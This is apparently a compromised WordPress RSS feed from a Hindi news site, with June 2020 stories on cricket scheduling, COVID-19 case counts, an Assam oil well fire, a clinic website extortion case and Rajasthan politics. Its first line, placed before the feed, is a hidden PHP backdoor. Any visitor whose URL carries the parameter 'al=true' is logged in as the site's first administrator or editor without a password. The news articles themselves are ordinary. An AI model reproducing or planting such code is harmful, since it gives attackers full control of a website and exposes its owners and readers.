// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); NEWSDESK – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Wed, 10 Jun 2020 14:41:07 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 आईसीसी मीटिंग आज / टी-20 वर्ल्ड कप पर जल्द फैसला चाहता है बीसीसीआई, इसके बाद आईपीएल और एशिया कप पर फैसला संभव वीडियो देखे https://pratyushaashakinayikiran.com/?p=4717 Wed, 10 Jun 2020 10:31:49 +0000 http://apnachhattisgarhlive.com/chhattisgarhrajya.com/?p=4717 इंटरनेशनल क्रिकेट काउंसिल (आईसीसी) की आज वर्चुअल मीटिंग है। इसमें इस साल ऑस्ट्रेलिया में होने वाले टी-20 वर्ल्ड कप पर फैसला हो सकता है। बीसीसीआई भी चाहता है कि वर्ल्ड कप के होने या टलने पर पर स्थिति साफ हो।इसके बाद आईपीएल और एशिया कप की रूप रेखा तैयार की जाएगी। सूत्रों की मानें तो इस मीटिंग में इसी महीने होने वाले आईसीसी अध्यक्ष पद के चुनाव के चलते टी-20 वर्ल्ड कप पर फैसला टल भी सकता है।

टी-20 वर्ल्ड कप ऑस्ट्रेलिया में 18 अक्टूबर से 15 नवंबर तक होना है। कोरोना के कारण 29 मार्च से होने वाला आईपीएल अनिश्चितकाल के लिए टाला जा चुका है। सितंबर में पाकिस्तान की मेजबानी में एशिया कप टी-20 भी होना है। इस पर भी फैसला होना है। माना जा रहा है कि अगर टी-20 वर्ल्ड कप टलता है तो उस विंडो का इस्तेमाल आईपीएल के लिए हो सकता है

]]>
कोरोना के बीच मदद / अमिताभ बच्चन ने वाराणसी के 500 प्रवासी मजदूरों के लिए तीन फ्लाइट बुक कीं, पहले प्लेन से 180 मजदूर रवाना वीडियो देखे https://pratyushaashakinayikiran.com/?p=4714 Wed, 10 Jun 2020 10:27:53 +0000 http://apnachhattisgarhlive.com/chhattisgarhrajya.com/?p=4714 मुंबई. सोनू सूद के बाद अब अमिताभ बच्चन ने प्रवासी मजदूरों के लिए फ्लाइट्स का इंतजाम किया है। उन्होंने वाराणसी के 500 मजदूरों को उनके घर तक पहुंचाने के तीन फ्लाइट बुक की हैं। बताया जा रहा है कि पहली फ्लाइट बुधवार सुबह 180 मजदूरों को लेकर उड़ान भर चुकी है। बाकी दो फ्लाइट भी बुधवार को ही रवाना होंगी। इनके बारे में अभी ज्यादा जानकारी सामने नहीं आई है।

रिपोर्ट्स की मानें तो यह पूरा काम अमिताभ बच्चन की कंपनी एबी कॉर्पोरेशन लिमिटेड के मैनेजिंग डायरेक्टर राजेश यादव और उनके सहयोगियों की निगरानी में हो रहा है। मिड डे ने अपनी रिपोर्ट में सूत्रों के हवाले से लिखा, ‘सब कुछ बहुत ही सावधानी के साथ किया जा रहा है, क्योंकि अमिताभ पब्लिसिटी नहीं चाहते थे। प्रवासी मजदूरों की दुर्दशा देखकर वे खुद को रोक नहीं पाए और उन्होंने मदद के लिए आगे आने का फैसला लिया।”

]]>
असम में ऑयल इंडिया के कुएं में आग / 2 फायर फाइटर की मौत, 1 झुलसा; कंपनी ने कहा- आग बुझाने में 4 हफ्ते लगेंगे वीडियो देखे https://pratyushaashakinayikiran.com/?p=4711 Wed, 10 Jun 2020 10:18:56 +0000 http://apnachhattisgarhlive.com/chhattisgarhrajya.com/?p=4711 तिनसुखिया. असम के तिनसुखिया जिले में बाघजन में ऑयल इंडिया के तेल के कुएं में मंगलवार को आग लग गई। कुएं से पिछले 14 दिन से गैस लीक हो रही थी। हादसे में 2 फायर फाइटर की मौत हो गई। ऑयल इंडिया के मुताबिक आग पर पूरी तरह काबू पाने में 4 हफ्ते लगेंगे।

कंपनी के प्रवक्ता त्रिदेव हजारिका के मुताबिक आग लगने के बाद लापता हुए दोनों फायर फाइटर के शव बुधवार सुबह मिले। शवों पर जलने के निशान नहीं हैं, इससे लगता है कि कर्मचारी कुएं में कूदे होंगे और डूबने से उनकी मौत हो गई। असली वजह पोस्टमार्टम के बाद पता चल पाएगी।

]]>
कोरोना संकट में जज्बे की 2 मिसालें / अपनों के तानों को अनसुना कर बचत के पैसों से मंदिर-मस्जिद को सैनिटाइज कर रहीं उज्मा, 80 साल के कुली मुजीबुल्ला ने फ्री में मजदूरों का लगेज उठाया वीडियो देखे https://pratyushaashakinayikiran.com/?p=4708 Wed, 10 Jun 2020 10:15:12 +0000 http://apnachhattisgarhlive.com/chhattisgarhrajya.com/?p=4708 लखनऊ. कोरोना संकट में जरूरतमंदों की मदद के लिए कई चेहरे सामने आए। इन्होंने जाति-मजहब से परे कौमी एकता की मिसाल पेश की। लखनऊ की सईद उज्मा परवीन व कुली मुजीबुल्ला की कहानी भी कुछ ऐसी ही है। शरीर से दुबली-पतली उज्मा हर दिन अपनी पीठ पर 20 लीटर वाली स्प्रेयर मशीन लादकर पुराने लखनऊ की उन तंग गलियों में पहुंच जाती हैं, जहां नगर निगम की टीम ने सैनिटाइजेशन से हाथ खड़े कर दिए थे। उज्मा ने इस काम में न तो मजहब का भेद रखा न ही ऊंच-नीच का।

]]>
ऑनलाइन ठगी / डॉक्टर के क्लिनिक की वेबसाइट हैक कर बिटकॉइन में 2 हजार डॉलर मांगे, कोटा में केस दर्ज https://pratyushaashakinayikiran.com/?p=4699 Tue, 09 Jun 2020 07:00:41 +0000 http://apnachhattisgarhlive.com/chhattisgarhrajya.com/?p=4699 झालावाड़. झालावाड़ मेडिकल कॉलेज के पैथोलॉजी विभाग के असिस्टेंट प्रोफेसर की पत्नी के नाम से कोटा में संचालित क्लिनिक की वेबसाइट को हैक कर दिया गया और वेबसाइट को मुक्त करने के लिए 2 हजार डॉलर की मांग की गई है। ऐसा नहीं करने पर डाटा का दुरुपयोग करने और बदनाम करने की धमकी दी गई है। इस पर डॉक्टर ने वेबसाइट हैंक करने वालों के खिलाफ केस दर्ज करवाया है।
मेडिकल कॉलेज पैथोलॉजी विभाग के असिस्टेंट प्रोफेसर डॉ. योंगेंद्र मदान ने कोटा में दर्ज कराई रिपोर्ट में बताया कि उनकी पत्नी के नाम से कोटा तलवंडी में स्किननेस स्किन केयर एंड लेसेस क्लिनिक है। इसकी वेबसाइट डब्ल्यूडब्ल्यूडब्ल्यू.स्किननेस.इन को रविवार को हैक कर दिया गया है। वेबसाइट हैक करने की जानकारी उनको ई-मेल के माध्यम से दी गई। ई-मेल में बताया कि उनकी वेबसाइट हैक कर दी गई है, उसे मुक्त कराने के लिए उनको 2000 डॉलर की मांग की गई।

हैक करने वालों ने डॉक्टर को ई-मेल भेजा है, इसमें जानकारी दी गई है कि अगर उन्होंने बिटकॉइन करेंसी में 2 हजार डॉलर नहीं दिए तो उननकी वेबसाइट का डाटा चोरी कर उसका दुरुपयोग किया जाएगा, इसके अलावा बदनाम करने की भी धमकी दी गई।

भास्कर नॉलेज : क्या है बिटकॉइन करेंसी
 बिटकॉइन एक तरह की क्रिप्टोकरेंसी है। अंग्रेजी शब्द ‘क्रिप्टो’ का अर्थ गुप्त होता है। यह एक प्रक्रार की डिजिटल करेंसी है, जो क्रिप्टोग्राफी के नियमों के आधार पर संचालित और बनाई जाती है। बिटकॉइन को आप छू नहीं सकते यानी कि यह डिजिटल फॉर्म में ही रहती है। यही इसकी सबसे खास बात है। दूसरे शब्दों में आप इसे विकेंद्रीकृत डिजिटल करेंसी भी कह सकते हैं। बिटकॉइन का आविष्कार साल 2009 में सतोषी नाकामोटो ने जापान से किया था।
कैसे करता है यह काम?
बिटकॉइन विशेषज्ञ हितेश मालवीय का कहना है कि बिटकॉइन वर्चुअल कॉइन (कृत्रिम सिक्के) हैं, जो अपनी कीमत बनाने और बढ़ाने के लिए डिजाइन किए गए हैं। इस तरह पैसों के लेन-देन के लिए आपकों बैंकों तक जाने की जरूरत नहीं है। यदि आपके पास बिटकॉइन है, तो इसकी कीमत और वैल्यू उसी तरह मानी जाएगी जैसे ईटीएफ में कारोबार करते समय सोने की होती है। आप बिटकॉइन के जरिए ऑनलाइन शॉपिंग भी कर सकते हैं और इसे निवेश के रूप में भी रख सकते हैं।

]]>
दसवीं का परिणाम / गुजरात का रिजल्ट 60.64 प्रतिशत, पिछले साल की तुलना में ठीक नहीं रहा https://pratyushaashakinayikiran.com/?p=4695 Tue, 09 Jun 2020 06:54:43 +0000 http://apnachhattisgarhlive.com/chhattisgarhrajya.com/?p=4695 अहमदाबाद. राज्य के माध्यमिक और उच्चतर माध्यमिक शिक्षा बोर्ड द्वारा ली गई कक्षा दसवीं का परीक्षा परिणाम घोषित कर दिया गया है। परिणाम 60.64 प्रतिशत रहा। यह परिणाम पिछले साल की तुलना में 6.33 फीसदी कम है।

सूरत ने मारी बाजी

इस बार सूरत सेंटर का परिणाम एक बार फिर सबसे ज्यादा 74.66 प्रतिशत रहा है। जबकि दाहोद जिले में सबसे कम 47.47 प्रतिशत परिणाम आया है। अगर अहमदाबाद की बात की जाए, तो इसका परिणाम शहरी के लिए 65.51 प्रतिशत और पहले की तुलना में 66.07 प्रतिशत अधिक है।


राज्य के केवल 1671 छात्रों को ही ए-वन ग्रेड 
इस बार प्रदेश से केवल 1671 छात्र ही ए-वन ग्रेड हासिल कर पाए हैं। जबकि 23,754 छात्रों को ए-टू और 58,128 छात्रों को बी-वन ग्रेड मिला। परीक्षा के नतीजे शिक्षा विभाग की वेबसाइट www.gseb.org पर ऑनलाइन देखे जा सकते हैं। विद्यालय में परिणाम वितरण की तिथि को बोर्ड द्वारा नियत समय में घोषित किया जाएगा।

]]>
आत्मनिर्भर भारत अभियान / केंद्र सरकार की उपलब्धियाें-योजनाओं को भाजपा गांव-गांव तक पहुंचाएगी https://pratyushaashakinayikiran.com/?p=4691 Tue, 09 Jun 2020 06:51:59 +0000 http://apnachhattisgarhlive.com/chhattisgarhrajya.com/?p=4691 बांसवाड़ा. आत्मनिर्भर भारत अभियान के तहत भाजपा कार्यालय में सोमवार को बांसवाड़ा विधानसभा क्षेत्र के पदाधिकारियों की बैठक हुई। इसमें केंद्र सरकार के दूसरे कार्यकाल के एक वर्ष पूरा होने पर सरकार की उपलब्धियों और योजनाओं को गांव-गांव तक पहुंचाने पर विस्तार से चर्चा की। साथ ही आत्मनिर्भर भारत अभियान पर पदाधिकारियों से चर्चा कर बूथ संपर्क अभियान की शुरुआत की। बैठक की अध्यक्षता जिलाध्यक्ष गोविंदसिंह राव ने की, मुख्य अतिथि पूर्व जिलाध्यक्ष मनोहर त्रिवेदी ने प्रधानमंत्री नरेंद्र मोदी के दूसरे कार्यकाल में विषम परिस्थितियों में भी देश हित में लिए गए निर्णय से सभी को अवगत कराया।

बैठक में प्रधानमंत्री के पत्रक का विमोचन किया गया। मुख्य वक्ता पूर्व जिलाध्यक्ष मनोहर पटेल ने इस पत्रक को पढ़कर सुनाया। संचालन जिला महामंत्री मुकेश रावत ने किया। आभार जिला उपाध्यक्ष दीपक जोशी ने जताया। बैठक में एसटी मोर्चा के प्रदेश उपाध्यक्ष  हकरू मईड़ा, पूर्व जिलाध्यक्ष भगवत पुरी, ओबीसी मोर्चा के जिलाध्यक्ष लाभचंद पटेल, जिला उपाध्यक्ष  प्रवीण गादिया, मणिलाल गुर्जर, पूर्व उपसभापति महावीर बोहरा, प्रवक्ता गौरवसिंह राव, प्रधान राजेश कटारा, नगर मंडल अध्यक्ष नीलेश जैन, मंडल अध्यक्ष संजय पंड्या, अर्जुन मईड़ा, पार्षद अशोक शर्मा, श्यामा राणा, नगर प्रभारी कन्हैयालाल राठौड़, पंकज मालोत, सुखलाल कलाल, हीरालाल पवार, मनोहर व्यास, मोतीलाल भगोरा, आदि उपस्थित रहे।

भाजपा के बूथ संपर्क अभियान के तहत गढ़ी विधानसभा क्षेत्र के प्रभारी भगवत पुरी ने गढ़ी, पालोदा, सरेड़ी बड़ी, अरथूना, तलवाड़ा, परतापुर-गढ़ी  नगर मंडल में सोशल डिस्टेंस की पालना करते हुए भाजपा कार्यकर्ताओं को प्रधानमंत्री नरेंद्र मोदी कार्यकाल के एक साल पूरा होने पर उनके कार्यकाल विवरण पत्रक वितरित किए। साथ ही वैश्विक महामारी करोना से बचने के उपायों पर चर्चा की गई। बैठक भगवत पुरी के मुख्य आतिथ्य, गढ़ी विधायक कैलाश चंद्र मीणा की अध्यक्षता और दिलीप परमार, नगर पालिका अध्यक्ष परतापुर-गढ़ी, लाभचंद पटेल, जिलाध्यक्ष ओबीसी मोर्चा के विशिष्ट आतिथ्य में हुई।

चंदनपुरा में विधायक के निवास पर आयोजित बैठक में विधायक ने प्रत्येक मंडल, शक्ति केंद्र और बूथ स्तर पर कार्य योजना बना कर प्रधानमंत्री का संदेश पहुंचाने की बात कही। वहीं विधायक एवं प्रभारी को पीएम केयर फंड में गढ़ी मंडल और अरथूना मंडल के अध्यक्षों ने चेक भेंट किए।

]]>
अनलॉक / बाजार आज खुलेंगे, होटल फिर दमके लेकिन वेलकम का अंदाज बदला, मॉल्स भी ओपन https://pratyushaashakinayikiran.com/?p=4687 Tue, 09 Jun 2020 06:48:03 +0000 http://apnachhattisgarhlive.com/chhattisgarhrajya.com/?p=4687 जयपुर. 78 दिन से बंद परकोटे के पांच बाजार पुरोहितजी का कटला, दड़ा मार्केट, घी वालों का रास्ता, धूला हाउस और लाल जी सांड का रास्ता भी मंगलवार से खुल जाएगा। इसके बावजूद चाय, चाट और सैलून जैसी करीब 1,500 दुकानों को अभी खोलने की मंजूरी नहीं है।

उधर, बीमारी के डर और कमजोर कारोबार के कारण 20 फीसदी दुकानें मंजूरी के बावजूद नहीं खोली गई है। इससे परकोटे की करीब 25,000 दुकानों में से 80 फीसदी ही खुल रही है। बाजार में महिला ग्राहक कम है। किराना, अनाज, प्लास्टिक व बर्तन जैसे आयटमों का ही कारोबार हो रहा है।

पांच बाजार खुलने से क्या फायदा

पुरोहित जी का कटला, दड़ा मार्केट, घी वालों का रास्ता, धूला हाउस और लालजी सांड का रास्ता समेत पांच बाजारों की करीब 3,000 दुकानों में से 50 फीसदी से ज्यादा साड़ी, लहंगा, कट पीस, गारमेंट और सांगानेरी प्रिंट समेत कपड़े की दुकानें है। अभी वेडिंग सीजन का आखिर दौर है। ऐसे में ग्राहकों जरूरत के हिसाब के गारमेंट और कपड़ा मिल सकेगा।

धूला हाउस के खुलने से ठप पड़ा सांगानेरी प्रिंट कपड़ा कारोबार बूस्ट मिलेगा। धूला हाउस की थोक दुकानों से सांगानेरी प्रिंट का कपड़ा देश-विदेश पहुंचता है। जयपुर व्यापार महासंघ के अध्यक्ष सुभाष गोयल ने कहा कि पांच बाजारों को खोलने से कपड़ा व्यापारियों को राहत मिलेगी।

व्यापार मंडलों की जिम्मेदारी

हर व्यापार मंडल को चौकीदार रखना होगा, जो सोशल डिस्टेंसिंग का पालना कराने के साथ सार्वजनिक स्थल लोगों को थूकने से रोकेगा। वाहन पार्किंग स्थल पर खड़े हो यह व्यापार मंडल सुनिश्चित करेगा। किसी भी दुकान के बाहर डिस्प्ले या आयटम नहीं होगा।

ऑड-ईवन में दुकान खोलने पर विचार

जयपुर व्यापार महासंघ के अध्यक्ष सुभाष गोयल ने कहा कि अभी बाजारों में ज्यादा ग्राहकी नहीं। तंग गलियों में भीड़-भाड़ बढ़ने पर व्यापारियों से चर्चा कर ऑड-ईवन नंबर से दुकानें खोलने पर विचार कर सकते हैं।

संकरी गलियों वाले बाजारों में एक दुकान में दो स्टॉफ और एक समय में एक ही ग्राहक होगा, थर्मल जांच के बाद ही ग्राहक को दुकान में प्रवेश की अनुमति, व्यापारी व ग्राहक के लिए मास्क जरूरी, व्यापारियों को यह सुनिश्चित करना होगा कि कोई भी सार्वजनिक स्थल पर थूके नहीं, दुकान के बाहर डिस्प्ले या आयटम रखने पर रोक रहेगी, व्यापार संगठनों को चौकीदार की व्यवस्था करनी होगी, जो सोशल डिस्टेंसिंग का पालन कराएगा, व्यापार मंडल सुनिश्चित करेंगे की वाहन पार्किंग स्थल में ही खड़े हो।

ऑनलाइन चेक-इन से ही होटलों में प्रवेश, क्यूआर कोड पर सब उपलब्ध

होटल्स और रेस्त्रां का  पहला दिन साफ-सफाई और सैनेटाइजेशन में बीता। सभी होटल मैनेजमेंट ने भी चेक-इन प्रोसेस से लेकर सिटिंग अरेंजमेंट्स तक में पूरी तरह से बदलाव किया है ताकि विजिटर्स को इन्फेक्शन से बचाया जा सके। जेएलएन रोड स्थित डब्ल्यूटीपी में प्रवेश के दौरान ग्राहकों को एक विशेष सैनेटाइज केज से सैनेटाइज किया जा रहा है।

जेएलएन रोड स्थित होटल क्लार्क्स आमेर में ऑनलाइन ही चेक-इन किया जाएगा। पहले दिन एक भी चेक-इन नहीं हुआ। अभी 50 प्रतिशत स्टाफ को ही बुलाया जा रहा है। इसमें प्रोडक्शन, सेल्स और फ्रंट ऑफिस स्टाफ शामिल हैं। रेस्त्रां में बुफे और आला-कार्ट सर्व नहीं किया जा रहा है। रूम में ही लंच और डिनर सर्व किया जा रहा है। होटल दी ललित के प्रत्येक हिस्से में क्यूआर कोड लगाए हैं। स्कैन करके हाउस कीपिंग सर्विस से लेकर खाने तक का ऑर्डर होगा।

]]>
राज्यसभा चुनाव / राजस्थान के विधायकों ने मुख्यमंत्री गहलोत से शिकायत की, दिल्ली से भाजपा के नेता फोन करके लालच दे रहे https://pratyushaashakinayikiran.com/?p=4683 Tue, 09 Jun 2020 06:44:05 +0000 http://apnachhattisgarhlive.com/chhattisgarhrajya.com/?p=4683 जयपुर. गुजरात में कांग्रेस विधायकों के इस्तीफे के बाद अब राजस्थान में भी राज्यसभा चुनाव से ठीक पहले सियासी हलचल तेज हो गई है। एक तरफ गुजरात के 22 विधायकों की राजस्थान में बाड़ाबंदी हो रही है, वहीं दूसरी ओर प्रदेश में कांग्रेस व इसके समर्थित निर्दलीय 10 से 12 विधायकों ने सीएम अशोक गहलोत से शिकायत की है कि दिल्ली से भाजपा के बड़े नेता उन्हें फोन कर रहे हैं। भाजपा में शामिल होने के लिए उन्हें सभी तरह के लालच दिए जा रहे हैं।

हाल में एक वरिष्ठ भाजपा नेता का एक ऑडियो भी वायरल हुआ। हालांकि, अब तक राजस्थान में किसी कांग्रेस समर्थित निर्दलीय विधायक ने खुलकर भाजपा में जाने के संकेत नहीं दिए हैं।

राजस्थान का सियासी गणित देखें तो कांग्रेस को कोई खतरा नहीं है। लेकिन भाजपा की नजर राजस्थान में गहलोत विरोधी उस गुट पर है जो लगातार सरकार के खिलाफ मुखर होता रहता है। भाजपा इसे ही साधने में जुटी है।

मप्र में कांग्रेस छोड़ भाजपा में शामिल हुए ज्योतिरादित्य सिंधिया गुट के 22 विधायकों का भविष्य जिस तरह अधर में है, उसे देखते हुए राजस्थान में कांग्रेस का असंतुष्ट खेमा भी सीधे तौर पर सियासी जोखिम लेने की स्थिति में नहीं है। इसके अलावा सीएम अशोक गहलोत का सियासी कद भी विधायकों को एकजुट रखने की बड़ी वजह है।

पीएम मोदी खुद कोरोना मैनेजमेंट को लेकर गहलोत की तारीफ कर चुके हैं। भीलवाड़ा मॉडल को पूरे देश ने सराहा। साथ ही, कोरोना से निपटने के मामले में भी गहलोत जिस तरह सभी विधायकों को साथ लेकर चले, उसे देखते हुए कोई उलटफेर आसान नहीं।

हालांकि, कांग्रेस के एक गुट में अंतर्विरोध देखते हुए ही भाजपा ने राज्यसभा चुनाव में दो प्रत्याशी उतारे हैं। जबकि उसके पास सिर्फ एक को जिताने लायक ही विधायक हैं। लेकिन कांग्रेस में कई विधायक मंत्री न बनने से नाराज चल रहे है। ऐसे ही नाराज विधायकों के दमखम पर भाजपा ने वोटों की गणित में कमजोर हुए भी दो प्रत्याशी मैदान में उतारे।

कांग्रेस और भाजपा में सीटों का अंतर बड़ा

कांग्रेस के पास अपने 107 विधायक हैं। 13 निर्दलीय विधायक भी उसी के समर्थन में हैं। आरएलडी सरकार में पहले ही शामिल है। इसके अलावा बीटीपी, लेफ्ट का झुकाव भी सरकार की तरफ ही है। वहीं, भाजपा गठबंधन के पास कुल 75 विधायक ही हैं।

मध्यप्रदेश में जो टूटे वे अब तक खाली हाथ

मप्र में ज्योतिरादित्य व उनके समर्थक 22 विधायकों को उपचुनावों में टिकट बंटवारे को लेकर अंतर्विरोध चरम पर है। जिन सीटों पर ये विधायक उपचुनाव लड़ना चाहते हैं वहां से भाजपा के कई वरिष्ठ नेता भी दावेदार हैं। नतीजतन कैबिनेट री-शफल अटका हुआ है। कांग्रेस छोड़कर भाजपा में आए विधायक खाली हाथ हैं।

राजनीतिक नियुक्तियों पर

कांग्रेस और उनके समर्थित विधायकों की नजर प्रदेश में होने वाली राजनीतिक नियुक्तियों पर भी है। जिन्हें सरकार में हिस्सेदारी नहीं मिली, उन्हें उम्मीद है कि उसमें तरजीह मिलेगी या अगले कैबिनेट विस्तार में जगह मिलेगी।

]]>
राजस्थान में कोरोना / अब अलवर में बढ़े केस; सबसे ज्यादा 67 संक्रमित, भरतपुर में 60…जयपुर में 34 रोगी, 3 माैतें भी https://pratyushaashakinayikiran.com/?p=4679 Tue, 09 Jun 2020 06:40:47 +0000 http://apnachhattisgarhlive.com/chhattisgarhrajya.com/?p=4679 जयपुर. राजस्थान में काेराेना का प्रकाेप बदस्तूर जारी है। साेमवार काे प्रदेश में 277 नए मरीज मिले और 6 की माैत हाे गई। मरने वालाें में तीन जयपुर के, 2 जाेधपुर के और एक भरतपुर का है। इस तरह प्रदेश में अब कुल मरीजाें की संख्या 10876 हाे गई है। वहीं, काेराेना से अब तक कुल 246 लाेग जान गंवा चुके हैं।

भरतपुर के बाद अब अलवर में कोरोना भड़क गया है। साेमवार काे अलवर में सबसे ज्यादा 67 नए संक्रमित मिले, इसी के साथ जिले में पिछले 98 दिन के रोगियों जितने रोगी एक ही दिन में मिलने से यहां मरीजाें का आंकड़ा 150 तक पहुंच गया। भरतपुर में लगातार पांचवें दिन कोहराम जारी रहा और 60 नए केस मिले। इसी के साथ भरतपुर में कुल संक्रमित 732 हो गए, जाे जयपुर और जाेधपुर के बाद सर्वाधिक हैं।

अलवर की इंदिरा कॉलोनी में संक्रमित मिले सब्जी विक्रेता के परिवार के 8 सदस्यों की रिपोर्ट भी पॉजिटिव आई है। इनके अलावा जोधपुर में 36, जयपुर में 34 नए केस मिले। चांदपोल में 6 नए रोगी मिले। संक्रमित प्रवासी बढ़कर 3125 हो गए हैं। पाॅजिटिव से निगेटिव रोगी 8117 हो गए हैं, यह कुल रोगियों 10876 का 74.83 प्रतिशत है। अब अस्पतालों में भर्ती रोगी 2513 हैं। वहीं, प्रदेश में कुल जांचें अब 5.18 लाख तक पहुंच गई हैं।

]]>